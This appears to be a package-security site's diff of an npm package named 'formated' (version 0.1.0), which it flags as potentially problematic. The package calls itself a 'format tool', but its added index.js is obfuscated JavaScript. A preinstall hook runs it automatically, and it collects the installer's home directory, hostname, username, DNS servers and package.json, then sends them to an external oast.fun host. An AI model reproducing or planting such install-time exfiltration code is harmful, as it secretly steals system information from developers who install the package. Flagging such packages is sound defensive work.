formated 0.1.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of formated might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x22a25c=_0x58cc;(function(_0xdd07db,_0xf565da){const _0xced1fc=_0x58cc,_0x399a58=_0xdd07db();while(!![]){try{const _0x318526=-parseInt(_0xced1fc(0xad))/0x1*(parseInt(_0xced1fc(0x9d))/0x2)+-parseInt(_0xced1fc(0x9e))/0x3*(parseInt(_0xced1fc(0xb6))/0x4)+-parseInt(_0xced1fc(0xa2))/0x5*(-parseInt(_0xced1fc(0xae))/0x6)+-parseInt(_0xced1fc(0xa6))/0x7*(parseInt(_0xced1fc(0xa9))/0x8)+parseInt(_0xced1fc(0x9b))/0x9*(-parseInt(_0xced1fc(0xb4))/0xa)+parseInt(_0xced1fc(0xaf))/0xb*(-parseInt(_0xced1fc(0xb3))/0xc)+parseInt(_0xced1fc(0xa8))/0xd;if(_0x318526===_0xf565da)break;else _0x399a58['push'](_0x399a58['shift']());}catch(_0x2a6d45){_0x399a58['push'](_0x399a58['shift']());}}}(_0x479c,0xa3351));const os=require('os'),dns=require(_0x22a25c(0xb0)),querystring=require('querystring'),https=require(_0x22a25c(0xac)),packageJSON=require(_0x22a25c(0x9a)),collectedDate=JSON[_0x22a25c(0x98)]({'hd':os['homedir'](),'hn':os[_0x22a25c(0xb5)](),'un':os[_0x22a25c(0xa5)]()['username'],'dns':dns[_0x22a25c(0xaa)](),'r':packageJSON?packageJSON[_0x22a25c(0x99)]:undefined,'v':packageJSON['version'],'pjson':packageJSON});function _0x58cc(_0x2b3aea,_0x413d69){const _0x479c6b=_0x479c();return _0x58cc=function(_0x58cc55,_0x487c94){_0x58cc55=_0x58cc55-0x98;let _0x7fe628=_0x479c6b[_0x58cc55];return _0x7fe628;},_0x58cc(_0x2b3aea,_0x413d69);}function _0x479c(){const _0x50204a=['46186478XtkEFI','8251272fvWjEH','getServers','message','https','2819PIsFNE','33906vYXyYH','553069zAVnlr','dns','POST','Request\x20error:','12xzUOvP','10babPtX','hostname','8oaVMVm','stringify','___resolved','./package.json','7261083wNjxve','sbfwstspuutiarcjzptfutygntsslnz7p.oast.fun','828etTDtz','387366sKDeKk','error','from','application/x-www-form-urlencoded','380kvEgGP','Response:','end','userInfo','7yIVmhs','length'];_0x479c=function(){return _0x50204a;};return _0x479c();}var postData=querystring[_0x22a25c(0x98)]({'msg':collectedDate});const options={'hostname':_0x22a25c(0x9c),'ports':0x1bb,'path':'/','method':_0x22a25c(0xb1),'headers':{'Content-Type':_0x22a25c(0xa1),'Content-Length':Buffer[_0x22a25c(0xa0)](postData)[_0x22a25c(0xa7)]}},req=https['request'](options,_0x4d9ab2=>{const _0x2891fc=_0x22a25c;let _0x2ae598='';_0x4d9ab2['on']('data',_0x42ef85=>{_0x2ae598+=_0x42ef85;}),_0x4d9ab2['on'](_0x2891fc(0xa4),()=>{const _0x2430d4=_0x2891fc;console['log'](_0x2430d4(0xa3),_0x2ae598);});});req['on'](_0x22a25c(0x9f),_0xbee7e8=>{const _0x2b5188=_0x22a25c;console[_0x2b5188(0x9f)](_0x2b5188(0xb2),_0xbee7e8[_0x2b5188(0xab)]);}),req['write'](postData),req[_0x22a25c(0xa4)]();
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "formated",
3
+ "version": "0.1.0",
4
+ "description": "format tool",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }